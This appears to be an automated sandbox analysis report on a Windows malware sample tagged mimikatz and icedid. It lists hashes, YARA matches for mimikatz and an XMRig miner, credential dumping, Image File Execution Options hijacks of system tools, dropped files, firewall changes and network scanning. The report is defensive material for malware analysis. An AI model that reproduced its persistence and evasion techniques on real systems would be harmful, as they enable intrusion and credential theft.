Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
12-10-2024 14:47
Behavioral task
behavioral1
Sample
2024-10-12_c39cb7665320e8eb07d9da0c601d167f_hacktools_icedid_mimikatz.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
2024-10-12_c39cb7665320e8eb07d9da0c601d167f_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20241007-en
General
-
Target
2024-10-12_c39cb7665320e8eb07d9da0c601d167f_hacktools_icedid_mimikatz.exe
-
Size
13.7MB
-
MD5
c39cb7665320e8eb07d9da0c601d167f
-
SHA1
6c7222d862dc2a181f0f646db8cdba33b06f230d
-
SHA256
0a5afdaafe9e16efa1d96ba6fc24dc1c84a34bb504dfa65eea17261001c537dd
-
SHA512
3e28438516b9c5c664ed7772039a579cc24b690611e7354a71da22cc79047f523d45b82d2a3dc608166f4d4e5a97dba04b53570404df68c4b6bd52458ee96f17
-
SSDEEP
196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYPHlTPemknGzwHdOgEPH:a3jz0E52/iv1E3jz0E
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 1472 created 2096 1472 bmesabc.exe 38 -
Contacts a large (19632) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 10 IoCs
resource yara_rule behavioral2/memory/3264-178-0x00007FF7D65A0000-0x00007FF7D66C0000-memory.dmp xmrig behavioral2/memory/3264-182-0x00007FF7D65A0000-0x00007FF7D66C0000-memory.dmp xmrig behavioral2/memory/3264-203-0x00007FF7D65A0000-0x00007FF7D66C0000-memory.dmp xmrig behavioral2/memory/3264-216-0x00007FF7D65A0000-0x00007FF7D66C0000-memory.dmp xmrig behavioral2/memory/3264-222-0x00007FF7D65A0000-0x00007FF7D66C0000-memory.dmp xmrig behavioral2/memory/3264-234-0x00007FF7D65A0000-0x00007FF7D66C0000-memory.dmp xmrig behavioral2/memory/3264-245-0x00007FF7D65A0000-0x00007FF7D66C0000-memory.dmp xmrig behavioral2/memory/3264-253-0x00007FF7D65A0000-0x00007FF7D66C0000-memory.dmp xmrig behavioral2/memory/3264-263-0x00007FF7D65A0000-0x00007FF7D66C0000-memory.dmp xmrig behavioral2/memory/3264-372-0x00007FF7D65A0000-0x00007FF7D66C0000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
resource yara_rule behavioral2/memory/3480-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/3480-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x0008000000023c9a-6.dat mimikatz behavioral2/memory/2140-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/3384-138-0x00007FF7D9FB0000-0x00007FF7DA09E000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts bmesabc.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts bmesabc.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe bmesabc.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 3852 netsh.exe 4384 netsh.exe -
Executes dropped EXE 27 IoCs
pid Process 2140 bmesabc.exe 1472 bmesabc.exe 3744 wpcap.exe 760 vrguwycnn.exe 3384 vfshost.exe 2004 nbriuecau.exe 552 xohudmc.exe 3848 ascsoo.exe 3264 ysiisu.exe 1448 nbriuecau.exe 3744 nbriuecau.exe 1436 nbriuecau.exe 3548 nbriuecau.exe 4664 bmesabc.exe 1476 nbriuecau.exe 4284 nbriuecau.exe 688 nbriuecau.exe 1936 nbriuecau.exe 1460 nbriuecau.exe 5048 nbriuecau.exe 4852 nbriuecau.exe 1948 nbriuecau.exe 1648 nbriuecau.exe 4308 nbriuecau.exe 3000 nbriuecau.exe 2260 lkinngyeb.exe 5264 bmesabc.exe -
Loads dropped DLL 12 IoCs
pid Process 3744 wpcap.exe 3744 wpcap.exe 3744 wpcap.exe 3744 wpcap.exe 3744 wpcap.exe 3744 wpcap.exe 3744 wpcap.exe 3744 wpcap.exe 3744 wpcap.exe 760 vrguwycnn.exe 760 vrguwycnn.exe 760 vrguwycnn.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 61 ifconfig.me 62 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BB4F4B8E2B2CFC476849B6B724C153FF bmesabc.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\ascsoo.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies bmesabc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft bmesabc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 bmesabc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData bmesabc.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File created C:\Windows\SysWOW64\ascsoo.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 bmesabc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE bmesabc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BB4F4B8E2B2CFC476849B6B724C153FF bmesabc.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache bmesabc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 bmesabc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content bmesabc.exe -
resource yara_rule behavioral2/files/0x0007000000023cea-134.dat upx behavioral2/memory/3384-135-0x00007FF7D9FB0000-0x00007FF7DA09E000-memory.dmp upx behavioral2/memory/3384-138-0x00007FF7D9FB0000-0x00007FF7DA09E000-memory.dmp upx behavioral2/memory/2004-142-0x00007FF6BEE50000-0x00007FF6BEEAB000-memory.dmp upx behavioral2/files/0x0007000000023cf4-141.dat upx behavioral2/memory/2004-147-0x00007FF6BEE50000-0x00007FF6BEEAB000-memory.dmp upx behavioral2/files/0x0007000000023cf2-164.dat upx behavioral2/memory/3264-165-0x00007FF7D65A0000-0x00007FF7D66C0000-memory.dmp upx behavioral2/memory/1448-171-0x00007FF6BEE50000-0x00007FF6BEEAB000-memory.dmp upx behavioral2/memory/3744-175-0x00007FF6BEE50000-0x00007FF6BEEAB000-memory.dmp upx behavioral2/memory/3264-178-0x00007FF7D65A0000-0x00007FF7D66C0000-memory.dmp upx behavioral2/memory/1436-180-0x00007FF6BEE50000-0x00007FF6BEEAB000-memory.dmp upx behavioral2/memory/3264-182-0x00007FF7D65A0000-0x00007FF7D66C0000-memory.dmp upx behavioral2/memory/3548-185-0x00007FF6BEE50000-0x00007FF6BEEAB000-memory.dmp upx behavioral2/memory/1476-193-0x00007FF6BEE50000-0x00007FF6BEEAB000-memory.dmp upx behavioral2/memory/4284-197-0x00007FF6BEE50000-0x00007FF6BEEAB000-memory.dmp upx behavioral2/memory/688-201-0x00007FF6BEE50000-0x00007FF6BEEAB000-memory.dmp upx behavioral2/memory/3264-203-0x00007FF7D65A0000-0x00007FF7D66C0000-memory.dmp upx behavioral2/memory/1936-206-0x00007FF6BEE50000-0x00007FF6BEEAB000-memory.dmp upx behavioral2/memory/1460-210-0x00007FF6BEE50000-0x00007FF6BEEAB000-memory.dmp upx behavioral2/memory/5048-214-0x00007FF6BEE50000-0x00007FF6BEEAB000-memory.dmp upx behavioral2/memory/3264-216-0x00007FF7D65A0000-0x00007FF7D66C0000-memory.dmp upx behavioral2/memory/4852-219-0x00007FF6BEE50000-0x00007FF6BEEAB000-memory.dmp upx behavioral2/memory/3264-222-0x00007FF7D65A0000-0x00007FF7D66C0000-memory.dmp upx behavioral2/memory/1948-224-0x00007FF6BEE50000-0x00007FF6BEEAB000-memory.dmp upx behavioral2/memory/1648-228-0x00007FF6BEE50000-0x00007FF6BEEAB000-memory.dmp upx behavioral2/memory/4308-231-0x00007FF6BEE50000-0x00007FF6BEEAB000-memory.dmp upx behavioral2/memory/3000-233-0x00007FF6BEE50000-0x00007FF6BEEAB000-memory.dmp upx behavioral2/memory/3264-234-0x00007FF7D65A0000-0x00007FF7D66C0000-memory.dmp upx behavioral2/memory/3264-245-0x00007FF7D65A0000-0x00007FF7D66C0000-memory.dmp upx behavioral2/memory/3264-253-0x00007FF7D65A0000-0x00007FF7D66C0000-memory.dmp upx behavioral2/memory/3264-263-0x00007FF7D65A0000-0x00007FF7D66C0000-memory.dmp upx behavioral2/memory/3264-372-0x00007FF7D65A0000-0x00007FF7D66C0000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File opened for modification C:\Windows\bisbgtln\spoolsrv.xml bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\cnli-1.dll bmesabc.exe File created C:\Windows\bisbgtln\docmicfg.xml bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\spoolsrv.exe bmesabc.exe File opened for modification C:\Windows\bisbgtln\vimpcsvc.xml bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\crli-0.dll bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\trfo-2.dll bmesabc.exe File created C:\Windows\bisbgtln\vimpcsvc.xml bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\AppCapture64.dll bmesabc.exe File created C:\Windows\bisbgtln\svschost.xml bmesabc.exe File opened for modification C:\Windows\bisbgtln\schoedcl.xml bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\coli-0.dll bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\schoedcl.exe bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\docmicfg.exe bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\svschost.xml bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\xdvl-0.dll bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\vimpcsvc.xml bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\schoedcl.xml bmesabc.exe File opened for modification C:\Windows\tqgibwews\Corporate\log.txt cmd.exe File created C:\Windows\tqgibwews\cuincnwui\vrguwycnn.exe bmesabc.exe File created C:\Windows\tqgibwews\cuincnwui\lkinngyeb.exe bmesabc.exe File created C:\Windows\tqgibwews\upbdrjv\swrpwe.exe bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\vimpcsvc.exe bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\AppCapture32.dll bmesabc.exe File created C:\Windows\bisbgtln\spoolsrv.xml bmesabc.exe File created C:\Windows\tqgibwews\cuincnwui\scan.bat bmesabc.exe File opened for modification C:\Windows\tqgibwews\cuincnwui\Result.txt lkinngyeb.exe File created C:\Windows\tqgibwews\UnattendGC\specials\libeay32.dll bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\spoolsrv.xml bmesabc.exe File opened for modification C:\Windows\bisbgtln\svschost.xml bmesabc.exe File created C:\Windows\tqgibwews\Corporate\vfshost.exe bmesabc.exe File created C:\Windows\tqgibwews\cuincnwui\Packet.dll bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\zlib1.dll bmesabc.exe File created C:\Windows\tqgibwews\cuincnwui\ip.txt bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\Shellcode.ini bmesabc.exe File created C:\Windows\tqgibwews\Corporate\mimilib.dll bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\vimpcsvc.xml bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\docmicfg.xml bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\spoolsrv.xml bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\docmicfg.xml bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\trch-1.dll bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\tucl-1.dll bmesabc.exe File created C:\Windows\tqgibwews\Corporate\mimidrv.sys bmesabc.exe File created C:\Windows\ime\bmesabc.exe bmesabc.exe File created C:\Windows\tqgibwews\cuincnwui\wpcap.exe bmesabc.exe File opened for modification C:\Windows\bisbgtln\docmicfg.xml bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\libxml2.dll bmesabc.exe File opened for modification C:\Windows\bisbgtln\bmesabc.exe 2024-10-12_c39cb7665320e8eb07d9da0c601d167f_hacktools_icedid_mimikatz.exe File opened for modification C:\Windows\tqgibwews\cuincnwui\Packet.dll bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\svschost.xml bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\exma-1.dll bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\ucl.dll bmesabc.exe File created C:\Windows\tqgibwews\cuincnwui\wpcap.dll bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\svschost.exe bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\ssleay32.dll bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\tibe-2.dll bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\schoedcl.xml bmesabc.exe File created C:\Windows\bisbgtln\schoedcl.xml bmesabc.exe File created C:\Windows\bisbgtln\bmesabc.exe 2024-10-12_c39cb7665320e8eb07d9da0c601d167f_hacktools_icedid_mimikatz.exe File created C:\Windows\tqgibwews\UnattendGC\specials\posh-0.dll bmesabc.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1904 sc.exe 2144 sc.exe 3844 sc.exe 1568 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bmesabc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ascsoo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 